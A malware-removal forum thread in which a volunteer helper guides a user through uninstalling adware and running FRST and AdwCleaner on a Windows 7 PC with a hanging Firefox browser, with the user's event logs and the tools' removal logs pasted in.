Error: (11/23/2016 12:29:03 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program firefox.exe version 50.0.0.6152 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 4510
 
Start Time: 01d245521e090194
 
Termination Time: 33
 
Application Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 
Report Id: 1c647781-b146-11e6-ba63-2c27d732c84b
 
Error: (11/23/2016 12:28:28 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 50.0.0.6152, time stamp: 0x581d7ed2
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00400002
Faulting process id: 0x46f8
Faulting application start time: 0x01d24552c6319499
Faulting application path: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
Faulting module path: unknown
Report Id: 0afdb6b6-b146-11e6-ba63-2c27d732c84b
 
Error: (11/22/2016 11:57:14 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program firefox.exe version 50.0.0.6152 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: b50
 
Start Time: 01d244e6a5d724ce
 
Termination Time: 428
 
Application Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 
Report Id: a7301aa3-b141-11e6-ba63-2c27d732c84b
 
Error: (11/22/2016 11:46:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: NIS.exe, version: 13.1.2.9, time stamp: 0x57d1daa2
Faulting module name: ntdll.dll, version: 6.1.7601.23569, time stamp: 0x57f7bb79
Exception code: 0xc0000005
Fault offset: 0x0004eb83
Faulting process id: 0x1978
Faulting application start time: 0x01d244e6957263be
Faulting application path: C:\Program Files (x86)\Norton Internet Security\Engine\22.8.1.14\NIS.exe
Faulting module path: C:\Windows\SysWOW64\ntdll.dll
Report Id: 3e4f3637-b140-11e6-ba63-2c27d732c84b
 
Error: (11/22/2016 11:32:15 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (11/22/2016 12:55:28 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.18525 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 2324
 
Start Time: 01d2448ccc16ca21
 
Termination Time: 35
 
Application Path: C:\Program Files\Internet Explorer\iexplore.exe
 
Report Id: 9ea1f0e3-b080-11e6-9fb8-2c27d732c84b
 
Error: (11/22/2016 12:53:46 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 54.0.2840.99 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1988
 
Start Time: 01d2448c65a40466
 
Termination Time: 60000
 
Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
Report Id: 30694cda-b080-11e6-9fb8-2c27d732c84b
 
Error: (11/22/2016 12:45:02 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
 
System errors:
=============
Error: (11/23/2016 06:38:03 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140995069
 
Error: (11/23/2016 06:38:03 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140995069
 
Error: (11/23/2016 06:38:03 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630203.
 
Error: (11/23/2016 06:38:03 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140995069
 
Error: (11/23/2016 06:38:03 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140995069
 
Error: (11/23/2016 06:38:03 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630203.
 
Error: (11/23/2016 06:37:06 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 107.
 
Error: (11/23/2016 06:37:06 PM) (Source: Schannel) (EventID: 4106) (User: NT AUTHORITY)
Description: An SSL 3.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The SSL connection request has failed.
 
Error: (11/23/2016 06:37:06 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 107.
 
Error: (11/23/2016 06:37:06 PM) (Source: Schannel) (EventID: 4106) (User: NT AUTHORITY)
Description: An SSL 3.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The SSL connection request has failed.
 
 
==================== Memory info =========================== 
 
Processor: AMD Athlon™ II X4 645 Processor
Percentage of memory in use: 54%
Total physical RAM: 5887.29 MB
Available physical RAM: 2679.36 MB
Total Virtual: 11772.75 MB
Available Virtual: 7799.03 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:920.27 GB) (Free:817.15 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:11.15 GB) (Free:1.36 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 09D940BD)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=920.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

  • 0

#4
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Hi

Going through your logs just now and a question.

 

ProxyEnable: [.DEFAULT] => Proxy is enabled.
ProxyServer: [.DEFAULT] => http=127.0.0.1:47574


Have you set a proxy server for internet traffic or know anything about this?
  • 0

#5
kenbarber

kenbarber

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 116 posts

i do not even know how to set a proxy. it is conceivable that one might have been set for me when it was set up. does it need one?


  • 0

#6
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Hi Kenbarber
 

i do not even know how to set a proxy. it is conceivable that one might have been set for me when it was set up. does it need one?


Its not something I would normally expect to see on a home computer and its not necessary. I will remove this.

Let' see if we can get things cleaned up. :)

Step1 - Remove unwanted programs

Please uninstall the following unwanted programs:
ask toolbar
Uninstall Helper



Note: If any of the programs are not listed, proceed to the next one and work through the list.

To do this:
Please go to Start Menu -> Control Panel -> Uninstall a program or Programs and Features
In the list of installed programs locate and click on the program to uninstall
Click uninstall.
Repeat the above steps for all the other programs to remove.


Step2 - Optional Uninstalls

I would also recommend uninstalling the following programs but the choice is up to you.

Hula desktop
Popcorn Time



Step3 - FRST fix


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Download the attached fixlist.txt to your desktop.Attached File  fixlist.txt   6.77KB   35 downloads
  • Ensure fixlist.txt is in the same location as FRST.exe on your desktop.
    FRSTfix.JPG
  • Run FRST by right clicking on it and selecting Run as Administrator and press Fix
  • On completion a log (fixlog.txt) will be generated.
  • Please select all text in this fix, copy (CTRL + C) and then Paste (CTRL + V) in your next reply.


    step4 - AdwCleaner



    Download AdwCleaner from here to the Desktop
  • Close all open windows and browsers
  • Double click the Adwcleaner icon to execute the program
  • When the Tool opens for the first time accept the Terms of use
    adwcleaner1_zpsfhqm5c1w.jpg
  • Click the Scan button and wait for the program to finish.
  • Click on options
    adwcleaner2_zpsewujy48f.jpg
    tick to reset -
    IE policies
    Chrome policies
    Chrome preferences
  • When finished, please click Cleaning button.
  • when cleaning is finished, you may be prompted to restart your computer.
  • Upon completion, a log (AdwCleaner[C*].txt) will open.
  • Please copy and paste this in your next reply.


    Things for your next post:
  • fixlog.txt
  • AdwCleaner[C*].txt
  • How is the computer running now?

  • 0

#7
kenbarber

kenbarber

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 116 posts

uninstall helper gives me a message that the requested action is invalid on a program that is not installed.    the ask toolbar goes thru the steps but stays in the list.  ????


  • 0

#8
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Ok. Carry on with the rest of the instructions.
  • 0

#9
kenbarber

kenbarber

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 116 posts

was surprised when computer restarted after fixlog was created.   computer running faster. however the foxfire browser still goes immediately in non-responsive mode as soon as it is opened.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 27-11-2016
Ran by Kenneth (27-11-2016 12:12:33) Run:3
Running from C:\Users\Kenneth\Desktop
Loaded Profiles: Kenneth (Available Profiles: Kenneth & LogMeInRemoteUser)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\MountPoints2: K - K:\autorun.exe
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\MountPoints2: {ab1cc1ef-ce44-11e0-9957-2c27d732c84b} - J:\KODAK_Software_Downloader.exe
ProxyEnable: [.DEFAULT] => Internet Explorer proxy is enabled.
ProxyServer: [.DEFAULT] => http=127.0.0.1:47574
ProxyEnable: [S-1-5-21-1169555862-3845460206-1416485692-1000] => Internet Explorer proxy is enabled.
ProxyServer: [S-1-5-21-1169555862-3845460206-1416485692-1000] =>
http=127.0.0.1:47574
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://search.coupons.com/
URLSearchHook: HKLM-x32 - MyPoint's Toolbar - {39b43360-c1aa-4a02-bb9d-9d41d7dd1531} - C:\Users\Kenneth\AppData\LocalLow\MyPoint's\prxtbMyPo.dll No File
URLSearchHook: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 - MyPoint's Toolbar - {39b43360-c1aa-4a02-bb9d-9d41d7dd1531} - C:\Users\Kenneth\AppData\LocalLow\MyPoint's\prxtbMyPo.dll No File
C:\Users\Kenneth\AppData\LocalLow\MyPoint's\
End 
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value not found.
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\K => key not found. 
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ab1cc1ef-ce44-11e0-9957-2c27d732c84b} => key not found. 
HKCR\CLSID\{ab1cc1ef-ce44-11e0-9957-2c27d732c84b} => key not found. 
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => value removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => value removed successfully
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value not found.
http=127.0.0.1:47574 => Error: No automatic fix found for this entry.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\URLSearchHooks\\{39b43360-c1aa-4a02-bb9d-9d41d7dd1531} => value not found.
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{39b43360-c1aa-4a02-bb9d-9d41d7dd1531} => value not found.
"C:\Users\Kenneth\AppData\LocalLow\MyPoint's" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 32346870 B
Java, Flash, Steam htmlcache => 108241 B
Windows/system/drivers => 3642680 B
Edge => 0 B
Chrome => 546288196 B
Firefox => 420898664 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 0 B
Kenneth => 1294097315 B
LogMeInRemoteUser => 0 B
 
RecycleBin => 4056171 B
EmptyTemp: => 2.2 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 

==== End of Fixlog 12:27:28 ====

 

 

# AdwCleaner v6.030 - Logfile created 27/11/2016 at 12:59:53
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-26.2 [Server]
# Operating System : Windows 7 Home Premium Service Pack 1 (X64)
# Username : Kenneth - KENNETH-HP
# Running from : C:\Users\Kenneth\Desktop\AdwCleaner (1).exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support
 
 
 
***** [ Services ] *****
 
[-] Service deleted: EsgScanner
 
 
***** [ Folders ] *****
 
[-] Folder deleted: C:\Users\Kenneth\AppData\Local\YSearchUtil
[-] Folder deleted: C:\Program Files (x86)\Yahoo!\yset
[-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil
[-] Folder deleted: C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pbjikboenpfhbbejgkoklgkhjpfogcam
 
 
***** [ Files ] *****
 
[-] File deleted: C:\Windows\SysNative\LavasoftTcpService64.dll
[-] File deleted: C:\Windows\SysNative\LavasoftTcpServiceOff.ini
[-] File deleted: C:\Windows\SysNative\drivers\EsgScanner.sys
[-] File deleted: C:\Program Files (x86)\Yahoo!\Common\unyt.exe
[-] File deleted: C:\Windows\SysWOW64\lavasofttcpservice.dll
[-] File deleted: C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini
 
 
***** [ DLL ] *****
 
 
 
***** [ WMI ] *****
 
 
 
***** [ Shortcuts ] *****
 
 
 
***** [ Scheduled Tasks ] *****
 
 
 
***** [ Registry ] *****
 
[-] Key deleted: HKLM\SOFTWARE\950fc29b-5727-0547-11f5-ef2e304e54b9
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\yourtemplatefinder.com
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.Protector
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.Protector.1
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib.1
[-] Key deleted: HKLM\SOFTWARE\Classes\Yahoo.AntiSpyPlugin
[-] Key deleted: HKLM\SOFTWARE\Classes\Yahoo.AntiSpyPlugin.6
[-] Key deleted: HKLM\SOFTWARE\Classes\Yahoo.PopupBlockerPlugin
[-] Key deleted: HKLM\SOFTWARE\Classes\Yahoo.PopupBlockerPlugin.4
[-] Key deleted: HKLM\SOFTWARE\Classes\YCAPlugin.CAYASPlugin
[-] Key deleted: HKLM\SOFTWARE\Classes\YCAPlugin.CAYASPlugin.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YMERemote.YMECompPlugin
[-] Key deleted: HKLM\SOFTWARE\Classes\YMERemote.YMECompPlugin.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YPUBC.BlockerCtrl
[-] Key deleted: HKLM\SOFTWARE\Classes\YPUBC.BlockerCtrl.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YPUBC.DataStore
[-] Key deleted: HKLM\SOFTWARE\Classes\YPUBC.DataStore.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YPUBC.PUBHTMLEventHandler
[-] Key deleted: HKLM\SOFTWARE\Classes\YPUBC.PUBHTMLEventHandler.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YPUBC.StringList
[-] Key deleted: HKLM\SOFTWARE\Classes\YPUBC.StringList.1
[-] Key deleted: HKLM\SOFTWARE\Classes\yt.CacheLoader
[-] Key deleted: HKLM\SOFTWARE\Classes\yt.CacheLoader.1
[-] Key deleted: HKLM\SOFTWARE\Classes\yt.Clickstream
[-] Key deleted: HKLM\SOFTWARE\Classes\yt.Clickstream.1
[-] Key deleted: HKLM\SOFTWARE\Classes\yt.YTHelper
[-] Key deleted: HKLM\SOFTWARE\Classes\yt.YTHelper.2
[-] Key deleted: HKLM\SOFTWARE\Classes\yt.YToolbarBand
[-] Key deleted: HKLM\SOFTWARE\Classes\yt.YToolbarBand.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YTabBar.YTabBarControl
[-] Key deleted: HKLM\SOFTWARE\Classes\YTabBar.YTabBarControl.1
[-] Key deleted: HKLM\SOFTWARE\Classes\ytbbroker.YTBCustomizerAssistant
[-] Key deleted: HKLM\SOFTWARE\Classes\ytbbroker.YTBCustomizerAssistant.1
[-] Key deleted: HKLM\SOFTWARE\Classes\ytbbroker.YTBMessengerAssistant
[-] Key deleted: HKLM\SOFTWARE\Classes\ytbbroker.YTBMessengerAssistant.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YTBM.YTBMButton
[-] Key deleted: HKLM\SOFTWARE\Classes\YTBM.YTBMButton.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YTNavAssist.NameSpaceCF
[-] Key deleted: HKLM\SOFTWARE\Classes\YTNavAssist.NameSpaceCF.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YTNavAssist.NameSpacePP
[-] Key deleted: HKLM\SOFTWARE\Classes\YTNavAssist.NameSpacePP.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YTNavAssist.YTNavAssistPlugin
[-] Key deleted: HKLM\SOFTWARE\Classes\YTNavAssist.YTNavAssistPlugin.1
[-] Key deleted: HKLM\SOFTWARE\Classes\YTSingleInstance.SingleInstance
[-] Key deleted: HKLM\SOFTWARE\Classes\YTSingleInstance.SingleInstance.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.Protector
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.Protector.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Yahoo.AntiSpyPlugin
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Yahoo.AntiSpyPlugin.6
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Yahoo.PopupBlockerPlugin
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Yahoo.PopupBlockerPlugin.4
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YCAPlugin.CAYASPlugin
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YCAPlugin.CAYASPlugin.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YMERemote.YMECompPlugin
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YMERemote.YMECompPlugin.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YPUBC.BlockerCtrl
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YPUBC.BlockerCtrl.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YPUBC.DataStore
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YPUBC.DataStore.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YPUBC.PUBHTMLEventHandler
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YPUBC.PUBHTMLEventHandler.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YPUBC.StringList
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YPUBC.StringList.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\yt.CacheLoader
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\yt.CacheLoader.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\yt.Clickstream
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\yt.Clickstream.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\yt.YTHelper
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\yt.YTHelper.2
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\yt.YToolbarBand
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\yt.YToolbarBand.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTabBar.YTabBarControl
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTabBar.YTabBarControl.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\ytbbroker.YTBCustomizerAssistant
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\ytbbroker.YTBCustomizerAssistant.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\ytbbroker.YTBMessengerAssistant
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\ytbbroker.YTBMessengerAssistant.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTBM.YTBMButton
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTBM.YTBMButton.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTNavAssist.NameSpaceCF
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTNavAssist.NameSpaceCF.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTNavAssist.NameSpacePP
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTNavAssist.NameSpacePP.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTNavAssist.YTNavAssistPlugin
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTNavAssist.YTNavAssistPlugin.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTSingleInstance.SingleInstance
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YTSingleInstance.SingleInstance.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{07CDAAD9-1226-4C6D-B774-C00E7B323484}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{1CAE874F-F5C7-4BCC-BA46-9AD26DF35B93}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{35860EFB-1589-4F32-A618-99E847A502B2}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{39DCCEAF-C749-4390-9953-527CF916935C}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{41D7CEE0-D91F-498C-BC88-4A6BEE46C2BC}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{7D831388-D405-4272-9511-A07440AD2927}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{9EDCCD11-960D-49AE-B523-C6B5AB7E1345}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{EB2BA65E-41F6-4F64-92A6-216CDFFDF577}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{EFC0651C-B6D7-49CD-A6E0-B1CE9AB5FE46}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{FFFFE1D1-E40D-49a1-9622-BC59BD1879C3}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{1147DC83-6208-4dca-8E88-DD45BAAB3043}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{11CB4723-D5A1-4a55-8D1D-5C2679D54CF5}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{1E57256D-9F39-4267-AB39-D7813D644C5A}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{31371420-098D-4C0E-A11E-EBEC2305DD01}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{37B8167C-B9A4-4316-94B2-67B64BB2BA7C}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{3A06AA27-D94B-48C2-BB55-9FD0FF2120E3}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{46140CE4-76FE-440E-AE88-4C2272BC05C7}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{6E40017D-FB6A-4804-BDE4-3BB09F1719C1}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{9F9C4C5C-2BA8-4E00-A697-9F710BB1026B}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{B7A0E898-93E5-43f4-B99A-6C70B303699C}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{C60CCE95-6AF9-4E74-B66B-3212D19F1D2F}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{D40A62D1-8FC0-4F03-90C4-0DE03BE73A41}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{DDCED22E-D018-471D-9A5C-A4EA2F21133D}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{E1A2D448-6334-45ec-8800-6D7F71DC87FC}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{F51C15D4-3D0A-4DBA-A095-EBCC09F24DA2}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{F9A10D86-182A-4946-869B-70C3D109D14D}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{FBE30D66-39A2-4b72-8B43-6D4C335A6F34}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{6EB4349D-4333-442F-ACA4-4C72AF28B6ED}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{F56ACA29-1C99-40F1-AC64-2E44C4F6BC71}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{11D5E9EA-3117-4389-8E58-742F0975C980}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{12D3E096-0FDF-42CC-8F44-04944F9C1648}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{22389F39-2CF4-47C4-B8B2-273BB16BF70C}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{23E3CEB3-D63A-433E-A5D0-4DB1C501B915}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{26A3152F-CF87-4C5B-8093-4D4B9EC084EB}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{2723E96B-905F-4C64-8999-D868A08E6370}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{29E3319C-4B3C-479F-8692-BDD2CA30BEDD}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{2FCB4E7E-E5C7-4D07-BB2C-78DF2DA867AD}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{367BD1CD-74A3-451F-B1A4-6A2DE4129A2D}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{38552F25-8DED-4206-BB21-041EF53328F9}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{3D592FCB-FEFD-43A6-9A4F-BDE2D4607D07}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{49F018EE-F362-4B5B-8EC8-BCF9246ABF21}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{63B73044-FC1A-4FE1-991B-FDBD4CDAA868}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{67E5E37C-E6B8-4782-877D-E9437C4CD982}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{686D40BC-FA43-4317-8474-E634E6B487F2}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{7207E52B-821E-4C05-A8D6-2965B2BE77CF}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{863FCF5D-DC39-4DA9-AF32-CB0025990EEE}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{A310B105-FB7D-4497-A7E8-E046462B012F}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{B09E015A-4D4E-4F8D-A436-95E19140947D}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{B1E712C4-03AA-495F-B0F5-0F057E126E2A}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{D13DC65C-C77B-4986-9078-DEA3D34C71BB}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{DF522774-8CA0-4B15-A93A-5F61AB95DA1C}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{F9A10D86-182A-4946-869B-70C3D109D14D}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{AD34BE7D-2603-43DD-8D1F-E4431D42C44E}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{B82D18E0-1649-48DE-92D7-AA89BBB5F0AD}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{D2EA97F6-6235-4B2D-B5AA-A4472B9CE557}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{ED62BC6E-64F1-46BE-866F-4C8DC0DF7057}
